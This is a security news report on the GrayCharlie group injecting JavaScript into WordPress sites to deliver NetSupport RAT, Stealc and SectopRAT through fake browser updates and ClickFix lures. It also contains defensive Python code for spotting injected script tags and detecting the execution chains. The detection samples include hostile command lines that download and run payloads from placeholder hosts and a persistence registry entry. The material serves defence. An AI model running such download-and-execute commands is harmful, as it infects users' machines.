A threat actor known as GrayCharlie has been compromising WordPress websites since mid-2023, silently embedding malicious JavaScript to push malware onto visiting users.
The group overlaps with the previously tracked SmartApeSG cluster, also called ZPHP or HANEMONEY. Its main tool is NetSupport RAT, a remote access trojan that gives attackers direct control over infected machines.
Beyond NetSupport RAT, the group has also deployed Stealc, an information-stealing malware, and more recently SectopRAT, broadening the scope of what attackers can steal from compromised systems.
GrayCharlie’s core technique involves inserting a script tag into the Document Object Model (DOM) of a legitimate but compromised WordPress site.
The tag points to an external JavaScript file hosted on attacker-controlled servers. When a visitor opens the page, the script profiles their browser and operating system before deciding what to show them next.
Victims are presented with either a convincing fake browser update or a ClickFix-style fake CAPTCHA — both designed to get users to install or execute the malware themselves without realizing it.
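A defender-side check for the injection technique described above, written as an added example (not tooling from the report, from Recorded Future, or from the group): it parses a page's HTML, lists every external script src, and flags those whose host is neither the site itself nor on an allowlist, plus a baseline diff that also catches injections hidden behind first-party-looking paths. The sample page, hostnames (on reserved `.test`/`.invalid` TLDs) and paths are constructed placeholders, not indicators from the article.

```python
"""Scan a page's HTML for <script src> tags that are not the site's own or allowlisted."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample WordPress page: two legitimate scripts, one injected tag, one inline script.
# Hostnames are placeholders on reserved TLDs, not indicators from the report.
SAMPLE_HTML = """<!doctype html>
<html><head>
<script src="https://example-lawfirm.test/wp-includes/js/jquery/jquery.min.js"></script>
<script src="/wp-content/themes/law/assets/app.js"></script>
</head><body>
<p>Welcome</p>
<script src="https://cdn.attacker.invalid/loader.js" async></script>
<script>/* inline */ console.log("ok")</script>
</body></html>
"""


class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> tag (None for inline scripts)."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.srcs.append(dict(attrs).get("src"))


def external_script_srcs(html):
    """Return src values of script tags, in document order, skipping inline scripts."""
    p = ScriptCollector()
    p.feed(html)
    return [s.strip() for s in p.srcs if s]


def find_unauthorized_scripts(html, site_host, allowed_hosts=()):
    """Flag external scripts whose host is neither the site itself nor on the allowlist.

    Relative URLs (no host) are treated as first-party; protocol-relative URLs
    are judged by their host. Hosts are compared case-insensitively.
    """
    allowed = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
    flagged = []
    for src in external_script_srcs(html):
        host = (urlparse(src).hostname or "").lower()
        if host and host not in allowed:
            flagged.append(src)
    return flagged


def new_scripts_since_baseline(html, baseline_srcs):
    """Diff the page against a known-good snapshot of script srcs.

    Catches an injected tag that points at a first-party path, which a host
    allowlist alone would accept.
    """
    known = set(baseline_srcs)
    return [s for s in external_script_srcs(html) if s not in known]


if __name__ == "__main__":
    print("unauthorized hosts:", find_unauthorized_scripts(SAMPLE_HTML, "example-lawfirm.test"))
    baseline = {"https://example-lawfirm.test/wp-includes/js/jquery/jquery.min.js",
                "/wp-content/themes/law/assets/app.js"}
    print("new since baseline:", new_scripts_since_baseline(SAMPLE_HTML, baseline))
```

In practice the HTML is fetched periodically from the live site (and compared with the files on disk, since the injection may live in a theme or plugin file rather than the database), and the baseline is refreshed only after a reviewed deploy. Inline scripts are deliberately not inspected here; a Content Security Policy with hashes or nonces is the usual control for those.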
Recorded Future analysts identified GrayCharlie’s backend infrastructure as tied primarily to MivoCloud and HZ Hosting Ltd.
The researchers tracked two main clusters of NetSupport RAT C2 servers, each defined by distinct TLS certificate naming patterns, license keys, and serial numbers — deployed steadily throughout 2025.
The group administers C2 servers over TCP port 443 and uses SSH to manage staging servers, helping its traffic appear normal. Browsing patterns from higher-tier infrastructure suggest at least some members of GrayCharlie are Russian-speaking.
The group’s attacks span many industries globally, though the United States remains its most frequent target. At least fifteen US law firm websites were found injected with identical malicious JavaScript pointing to the same attacker domain.
Researchers believe these law firms were compromised through a supply-chain attack involving SMB Team, an IT services company serving numerous law firms across North America.
[Figure (caption truncated in extraction): ... and SMBTeam logo (bottom) (Source: Elastic)]
Stolen credentials tied to an SMB Team email address surfaced around the time the malicious domain first became active.
Once a victim runs the JavaScript file delivered by the fake update, the Windows Script Host (WScript) executes it and spawns PowerShell, which downloads and extracts a full NetSupport RAT client into the user's AppData folder.
The ClickFix chain works similarly — the user pastes an attacker-planted command that retrieves a batch file, installs the RAT, and writes a Registry Run key for persistence on every reboot.
Operators connect via C2, run system reconnaissance, and can drop SectopRAT as a secondary payload.
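The two execution chains above (fake update: WScript spawning PowerShell; ClickFix: a pasted command retrieving a batch file and writing a Run key) translate directly into endpoint detections. The following is an added example, not detection content from the report: three simple rules run over constructed Sysmon-style events (EventID 1 = process creation, EventID 13 = registry value set). The paths, hostnames, SID and command lines are invented placeholders.

```python
"""Detect GrayCharlie-style execution chains over sample endpoint telemetry."""
import ntpath
import re

# Constructed Sysmon-style events; none of these values come from the report.
SAMPLE_EVENTS = [
    # Fake-update chain: script under the Windows Script Host spawns PowerShell
    # that pulls an archive into AppData.
    {"EventID": 1,
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr https://update.example.invalid/x.zip '
                    r'-OutFile $env:APPDATA\x.zip; Expand-Archive $env:APPDATA\x.zip $env:APPDATA\x"'},
    # ClickFix chain: command pasted into the Run box (explorer.exe parent) fetches a batch file.
    {"EventID": 1,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c curl -s https://captcha.example.invalid/a.bat -o %APPDATA%\a.bat && %APPDATA%\a.bat"},
    # Persistence: Run key value pointing into the user's AppData.
    {"EventID": 13,
     "Image": r"C:\Windows\System32\cmd.exe",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\alice\AppData\Roaming\svc\client.exe"},
    # Benign: user launching a browser from the desktop.
    {"EventID": 1,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": "firefox.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELLS = {"powershell.exe", "pwsh.exe"}
PASTE_SHELLS = POWERSHELLS | {"cmd.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def _base(path):
    """Lower-cased file name of a Windows path ('' if missing)."""
    return ntpath.basename(path or "").lower()


def rule_script_host_spawns_powershell(ev):
    """Fake-update chain: wscript/cscript is the parent of PowerShell."""
    return (ev.get("EventID") == 1
            and _base(ev.get("ParentImage")) in SCRIPT_HOSTS
            and _base(ev.get("Image")) in POWERSHELLS)


def rule_clickfix_paste(ev):
    """ClickFix chain: a shell launched from explorer.exe whose command line fetches over HTTP."""
    return (ev.get("EventID") == 1
            and _base(ev.get("ParentImage")) == "explorer.exe"
            and _base(ev.get("Image")) in PASTE_SHELLS
            and URL_RE.search(ev.get("CommandLine", "")) is not None)


def rule_run_key_points_into_appdata(ev):
    """Persistence: a Run key value whose target lives under a user's AppData."""
    return (ev.get("EventID") == 13
            and "\\currentversion\\run\\" in ev.get("TargetObject", "").lower()
            and "\\appdata\\" in ev.get("Details", "").lower())


RULES = {
    "script_host_spawns_powershell": rule_script_host_spawns_powershell,
    "clickfix_paste": rule_clickfix_paste,
    "run_key_points_into_appdata": rule_run_key_points_into_appdata,
}


def detect(events):
    """Return (event index, rule name) for every rule that matches an event."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name} -> {SAMPLE_EVENTS[idx].get('CommandLine') or SAMPLE_EVENTS[idx].get('Details')}")
```

The ClickFix rule keys on explorer.exe as the parent because the Win+R Run box and the File Explorer address bar both spawn from it; expect some noise from administrators pasting legitimate one-liners, so tune it against your environment rather than blocking on it outright. The Run-key rule is the cheapest of the three to check retroactively across a fleet.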
To reduce exposure, security teams should block known GrayCharlie IP addresses and domains, deploy YARA, Snort, and Sigma detection rules in SIEM or EDR platforms, and monitor WordPress sites for unauthorized DOM script injections.
The post GrayCharlie Injects Malicious JavaScript into WordPress Sites to Deliver NetSupport RAT and Stealc appeared first on Cyber Security News.